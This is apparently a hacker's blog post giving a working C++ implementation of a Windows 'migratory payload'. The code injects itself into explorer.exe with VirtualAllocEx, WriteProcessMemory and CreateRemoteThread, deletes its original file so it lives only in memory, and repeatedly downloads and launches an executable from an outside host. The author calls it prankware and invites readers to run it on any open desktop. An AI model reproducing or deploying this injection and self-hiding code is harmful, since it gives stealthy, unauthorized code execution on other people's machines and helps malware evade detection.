Writing Migratory Payloads
Hi. I’m procrastinating again, but this time it’s related to the project I’m procrastinating on. And according to a well-respected hacker, this is a functional way to be productive. So you, the reader, benefit from everything. Besides, the deadline for the Phrack CFP isn’t for another few months, so I’ve got time. (Famous last words.)
First of all, what the hell do I mean by migratory payload? That’s not a term in MITRE ATT&CK! In more technical terms, when I say “migratory payload,” I am referring to an executable that can move into the address space of another running executable after starting life as its own process. Think of an executable that runs away from your mouse and injects itself into explorer.exe after you double-click it. It ultimately relies on process injection, a close relative of DLL injection. MITRE can be fun to rag on, but they host a useful technical compendium.
So why did I make up the term “migratory payload,” and what does it do? It sounds neat and it does what it says on the tin: migrates from executable to executable via whatever method of memory injection deemed necessary. Here’s an executive summary of what a migratory payload would do:
- Start (as you do)
- Allocate memory in another process
- Write executable to allocated memory
- Spawn thread that loads and runs the executable image in the target process
- Delete original process
- Party in the target executable
But is this just a party trick? Kind of, but it’s useful: once you’re in the memory of a trusted process like explorer.exe, it can be difficult to extract you without knowing that explorer.exe is infected. Interestingly, there’s honestly not a lot to writing a migratory payload. There are just a lot of moving pieces to keep track of to write the program effectively.
Let’s talk about how to write an effective payload of this variety!
Don’t Sweat the Techniques
I have practically spammed this article I wrote about how to load a PE file manually. You’re gonna wanna read it again if you’re not already familiar with the process, because we need it to load our PE file once it’s injected into the target process. Depending on which process we’re migrating to, we might want to call a different function to load our binary. Despite being remote to the target process, we don’t need to rely on __declspec(dllexport) entries to call target functions! We can simply calculate the RVA of the function we wish to call, add it to the base address of our image in the remote process, and pass the resulting address to CreateRemoteThread.
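The RVA calculation is plain pointer arithmetic, so here is a minimal sketch of it on its own. The name rebase_address is made up for illustration and is not from the original project; it assumes the remote copy of the image keeps the same layout as the local one.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helper (not from the original project): translate an address
// inside our own image into the address it has in a copy of the same image
// mapped at remote_base. Assumes both copies share the same internal layout.
inline std::uintptr_t rebase_address(std::uintptr_t local_base,
                                     std::uintptr_t local_address,
                                     std::uintptr_t remote_base) {
    // An address below the image base cannot belong to the image.
    assert(local_address >= local_base);
    // The RVA is the offset from the image base; it does not depend on
    // where the image happens to be mapped.
    const std::uintptr_t rva = local_address - local_base;
    return remote_base + rva;
}
```

A function that lives at 0x401234 in an image based at 0x400000 has an RVA of 0x1234, so in a copy based at 0x10000000 it lands at 0x10001234.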
If you’re familiar with how modern programs in MSVC compile down to code, you know about the C runtime. If you’re not familiar, the C and C++ runtimes are the boilerplate code included in your program that runs before your code does and defines how the various entrypoints behave. It is what drives the difference between main and WinMain. It’s the reason for the separate /MD and /MT compiler switches. Because /MD depends on a build-specific MSVC runtime DLL, and /MT statically links a runtime that still has to be initialized before main is called regardless of whether it’s a DLL or EXE entrypoint, we need to be aware of this when initializing our binary in another process. You might be tempted to say fuck it and issue the /NODEFAULTLIB linker switch for maximum flexibility, which ultimately wipes out the C runtime preamble, but unless you’re prepared for the painful hell that is lacking a C runtime, you don’t want to do that.
Let’s talk about entrypoints for a second. Depending on whether your binary is configured to be a DLL or an EXE, you get wildly different entrypoints. For DLLs, you have the following entrypoint:
BOOL WINAPI DllMain(HINSTANCE dll_instance, DWORD reason, LPVOID reserved)
This is not just the C runtime entrypoint either: when a file is loaded by the Windows loader as a DLL, AddressOfEntryPoint points to a function with that signature.
For executables, though, the entrypoint isn’t like the C runtime entrypoint for main at all. The executable entrypoint, which we’ll call start, is very simple:
int start(void)
This is from the deep lore that is the Windows loader.
Because a DLL by design separates functions (exports) from loaders (DllMain), it is clearly the superior configuration for this sort of setup, since we have to deal with the C runtime preamble one way or another. This is why DLL injection reigns supreme: it is an easily shimmable piece of code with a clear line between functionality and loading. But DLLs are hard to deploy without some sort of corresponding executable piece. A DLL needs a trigger, after all. So let’s make an executable with a multipurpose main routine!
The main routine for the C runtime comes with a quirk: when you return from main, ExitProcess is eventually called. This is problematic if we’re going to invade the space of a permanently-running executable like explorer.exe with CreateRemoteThread! We can register an atexit routine that calls ExitThread (see its documentation) before the runtime gets as far as ExitProcess. And since we have control over the allocated memory of the module when it migrates to another executable’s space, we can use arbitrary thread functions to instrument the pre-load state of the binary as it migrates.
The superiority of the DLL approach also rears its ugly head here: we need a fresh image to inject into our target program! Interestingly, however, it’s also its Achilles’ heel. What makes the DLL superior is that it can rapidly launch from disk into a target process with easily supported mechanisms like LoadLibraryA coupled with CreateRemoteThread. See, the DLL is being converted from a disk image to a memory image, and it achieves this by existing on disk to begin with. What if, once we’ve stopped existing on disk and have infested one process, we wanted to infest another? Well, we would need to preserve the image in its pre-load state, which is typically its disk image state. Since the goal here is to exist outside the system’s disk as much as possible, we can be rather fluid about what that prior state looks like, but we’ll be lazy and just stick with the disk image as a base state for now.
That’s a lot of fucking words without a break and I’m sorry, but I’m trying to set the scene here. Let’s break down what we need as a base state for the migratory payload:
- a main routine with some sort of multi-entrant state (since we’re calling it for the C runtime)
- the migration fork in the main routine which sets ExitThread atexit hooks
- a loader thread which loads the image and sets the target state
- a fresh copy of the memory image prior to the calling of the entrypoint for fresh migration
That’s enough theory, let’s let the rubber hit the pavement and get an implementation going.
Applying the Techniques
First of all, fuck main for this purpose. main in the C runtime triggers spawning a console window. Do you really want to spawn a new console window with every infection? “Maybe I want to debug it,” you might be thinking. Sure, if that’s your style of debugging, I’m not going to knock it. I’m not going to throw stones: printf debugging is an age-old technique and I’m guilty of it sometimes too. No, we want good old WinMain for this (see its documentation).
int WINAPI WinMain(HINSTANCE instance, HINSTANCE prev_instance, LPSTR command_line, int show_command)
Secondly, we want a fresh image for migration purposes! How do we get that? Our executable is at its freshest just before the first entrypoint, which is not WinMain but a TLS callback. So we create a TLS callback which parses our executable’s PE header to get the size of the image and copies a fresh image for later manipulation.
VOID WINAPI get_fresh_image(PVOID instance, DWORD reason, PVOID reserved) {
    if (reason != DLL_PROCESS_ATTACH)
        return;
    std::uint8_t *self_u8 = (std::uint8_t *)instance;
    PIMAGE_NT_HEADERS64 nt_headers = get_nt_headers(self_u8);
    FRESH_IMAGE = (std::uint8_t *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nt_headers->OptionalHeader.SizeOfImage);
    std::memcpy(FRESH_IMAGE, self_u8, nt_headers->OptionalHeader.SizeOfImage);
}
#pragma comment(linker, "/INCLUDE:_tls_used")
#pragma comment(linker, "/INCLUDE:tls_callback")
#pragma const_seg(push)
#pragma const_seg(".CRT$XLAAA")
extern "C" const PIMAGE_TLS_CALLBACK tls_callback = get_fresh_image;
#pragma const_seg(pop)
We specifically call HeapAlloc and not std::malloc because std::malloc requires the C runtime to be initialized, which occurs when the main entrypoint is called, and our TLS callback is specifically intended to run before that. If you really wanted to, you could call VirtualAlloc, but since the image is going to be executed from a remote buffer rather than this one, it seems a little overkill.
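The callback leans on a get_nt_headers helper that isn’t shown here. As a rough, platform-neutral sketch of the header walk involved, the following reads SizeOfImage straight out of a byte buffer using the offsets from the published PE format. The names read_at and pe_size_of_image are mine, not the project’s, and the code assumes a little-endian host.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Copy a T out of buf at offset, refusing to read past the end of the buffer.
template <typename T>
bool read_at(const std::uint8_t *buf, std::size_t len, std::size_t offset, T *out) {
    if (offset > len || len - offset < sizeof(T))
        return false;
    std::memcpy(out, buf + offset, sizeof(T));  // assumes a little-endian host
    return true;
}

// Hypothetical helper: fetch SizeOfImage from a PE image held in memory.
// Returns false if the buffer does not look like a PE image.
bool pe_size_of_image(const std::uint8_t *buf, std::size_t len, std::uint32_t *size_out) {
    assert(buf != nullptr && size_out != nullptr);
    std::uint16_t mz = 0;
    if (!read_at(buf, len, 0, &mz) || mz != 0x5A4D)  // "MZ"
        return false;
    std::uint32_t e_lfanew = 0;  // file offset of the NT headers
    if (!read_at(buf, len, 0x3C, &e_lfanew))
        return false;
    std::uint32_t signature = 0;
    if (!read_at(buf, len, e_lfanew, &signature) || signature != 0x00004550)  // "PE\0\0"
        return false;
    // The 4-byte signature and the 20-byte file header precede the optional
    // header; SizeOfImage sits 56 bytes into it for both PE32 and PE32+.
    const std::size_t optional_header = static_cast<std::size_t>(e_lfanew) + 4 + 20;
    return read_at(buf, len, optional_header + 56, size_out);
}
```

The bounds checks matter more for images read from disk than for your own mapped module, but they cost nothing and keep the sketch honest.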
Because we might want our loader to rely on data and code relocated by the relocation directory, we separate relocating the binary from the loader, and perform the relocation on the binary before it’s written to the process space of the target binary we want to migrate to.
You might also be painfully aware of another bottleneck: a single argument being passed to our loader and other target functions, since we’re relying on CreateRemoteThread. The worst part is that we can’t successfully pass anything that relies on pointers via CreateRemoteThread, because those pointers mean nothing in the target’s address space. We would need to deep copy and transfer the data we need via VirtualAllocEx and WriteProcessMemory to the target process, then pass that pointer to CreateRemoteThread as the thread’s argument. Clunky, but it works.
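One way to dodge the deep copy entirely is to keep the argument flat, so a byte-for-byte copy is already a complete copy. Here is a minimal sketch of that idea. FlatConfig and set_launcher_file are hypothetical stand-ins, loosely modeled on the fields the SheepConfig structure uses further down, and not the project’s actual definition.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <type_traits>

// Hypothetical stand-in for a cross-process configuration block. Every field
// is stored inline: a fixed-size buffer instead of a char* or a std::string.
struct FlatConfig {
    std::uint64_t image_base;
    std::uint32_t launcher_pid;
    std::uint32_t max_sheep;
    char launcher_file[260];  // 260 matches MAX_PATH on Windows
};

// If these hold, copying sizeof(FlatConfig) bytes copies everything there is.
static_assert(std::is_trivially_copyable<FlatConfig>::value,
              "config must survive a raw byte copy");
static_assert(std::is_standard_layout<FlatConfig>::value,
              "config layout must be predictable");

// Store a path in the inline buffer, truncating if needed and always
// leaving a terminating null.
inline void set_launcher_file(FlatConfig &config, const char *path) {
    assert(path != nullptr);
    std::strncpy(config.launcher_file, path, sizeof(config.launcher_file) - 1);
    config.launcher_file[sizeof(config.launcher_file) - 1] = '\0';
}
```

The static_asserts are the useful part: the moment someone adds a std::string or a raw pointer-owning member, the build breaks instead of the copy silently carrying a dangling pointer.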
Spamming you with this how-to again, because now’s the time in the article where we talk about writing the loader. On top of needing to prepare the image for execution as if we’re calling LoadLibrary, we need to alter the main state of the migrated binary so that our WinMain routine takes a different route. Once we’ve changed the state with the loader routine, we can write our configuration data to the process and re-execute WinMain with our altered state.
Now it’s time to use the loader. We need to open our target process for manipulation and injection. Once we’ve found our target process (I have chosen to call EnumProcesses to find explorer.exe), we can attempt to acquire a process handle in the following way.
/* open pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE */
HANDLE explorer_proc = OpenProcess(PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, found_pid);
assert(explorer_proc != nullptr);
From here, we can create a copy of our fresh image and write it into our target process’s memory space.
/* allocate space for our executable */
std::uint8_t *self_u8 = (std::uint8_t *)GetModuleHandleA(nullptr);
PIMAGE_NT_HEADERS64 self_nt = get_nt_headers(self_u8);
std::uintptr_t explorer_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, self_nt->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
assert(explorer_base != 0);
/* copy the executable in memory and relocate it to the allocated base */
std::uint8_t *copy_u8 = (std::uint8_t *)std::malloc(self_nt->OptionalHeader.SizeOfImage);
std::memcpy(copy_u8, FRESH_IMAGE, self_nt->OptionalHeader.SizeOfImage);
relocate_image(copy_u8, (std::uintptr_t)self_u8, explorer_base);
/* write the relocated executable to the process's allocation with WriteProcessMemory */
SIZE_T bytes_written;
assert(WriteProcessMemory(explorer_proc, (LPVOID)explorer_base, copy_u8, self_nt->OptionalHeader.SizeOfImage, &bytes_written));
We then create the configuration needed for our migrated binary, copy it into the memory of our target executable, then create a thread for our loader by calculating our loader function’s RVA and executing it with the configuration pointer.
std::uintptr_t config_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, sizeof(SheepConfig), MEM_COMMIT, PAGE_READWRITE);
assert(config_base != 0);
SheepConfig explorer_config;
std::memset(&explorer_config, 0, sizeof(SheepConfig));
explorer_config.image_base = explorer_base;
explorer_config.state = MonitorState::STATE_MONITOR;
explorer_config.launcher_pid = GetCurrentProcessId();
explorer_config.max_sheep = 10;
GetModuleFileName(nullptr, &explorer_config.launcher_file[0], MAX_PATH);
assert(WriteProcessMemory(explorer_proc, (LPVOID)config_base, &explorer_config, sizeof(SheepConfig), &bytes_written));
/* get the rva of the loader and call it with CreateRemoteThread */
DWORD loader_rva = VA_TO_RVA(self_u8, load_image);
DWORD loader_id;
HANDLE loader_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+loader_rva), (LPVOID)config_base, 0, &loader_id);
assert(loader_handle != nullptr);
/* wait for the thread to finish */
WaitForSingleObject(loader_handle, INFINITE);
Finally, all that’s left to do is re-execute WinMain in the target process.
/* get the rva of the target routine and call it with CreateRemoteThread */
DWORD main_id;
HANDLE main_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+self_nt->OptionalHeader.AddressOfEntryPoint), nullptr, 0, &main_id);
assert(main_handle != nullptr);
Demo Payload: Sheep Monitor
Let’s talk about the demo payload for a moment. I am a particular fan of the classic eSheep program and if you’ve been paying attention you’ve noticed me using it a lot in the preceding blogs. This demo payload is no different. One of the things I wanted this demo payload to do was demonstrate being aggressively memory-resident, and recreating the classic “delete yourself” technique in this part of the payload. So in the opening routine of our payload, we have the following code.
case MonitorState::STATE_MONITOR: {
atexit(exit_thread);
DWORD exit_code = STILL_ACTIVE;
do {
HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, GLOBAL_CONFIG->launcher_pid);
// if it results in a null handle, the process is probably dead
if (proc == nullptr)
break;
GetExitCodeProcess(proc, &exit_code);
Sleep(1000);
} while (exit_code == STILL_ACTIVE);
Here, we open the original launcher process ID and sit on it until it stops running. Then, we wait until the file is deleted from disk before continuing.
/* we could get fancy and persist in the registry if we so wanted to right here,
* but for demo purposes we simply delete the original file */
while (!DeleteFile(GLOBAL_CONFIG->launcher_file)) {
DWORD error = GetLastError();
if (error == ERROR_FILE_NOT_FOUND)
break;
Sleep(1000);
}
We are now ready to enter our main process loop. Functionally, it’s pretty simple.
- Create a pool of processes
- If the sheep program isn’t present, download it
- If the pool isn’t at the limit, spawn a new sheep while clearing inactive sheep
- If the pool is full, every sheep plays Russian Roulette to thin out the herd
- Sleep for 60 seconds and do it all again
std::vector<PROCESS_INFORMATION> sheep_pool;
while (GetFileAttributes("C:\\ProgramData\\sheep.exe") != INVALID_FILE_ATTRIBUTES || download_url(L"amethyst.systems", L"/sheep.exe", "C:\\ProgramData\\sheep.exe")) {
    if (sheep_pool.size() > 0)
        while (clear_inactive_sheep(sheep_pool));
    if (sheep_pool.size() < GLOBAL_CONFIG->max_sheep) {
        PROCESS_INFORMATION new_sheep;
        if (spawn_sheep(&new_sheep))
            sheep_pool.push_back(new_sheep);
    }
    else
        russian_roulette(sheep_pool);
    Sleep(60000);
}
This payload could be considered functional prankware. Feel free to run it on any open desktop you find! It’s memory-resident and disappears either when explorer.exe
crashes (though not as a result of us) or when the user reboots.
Merry Christmas and happy hacking!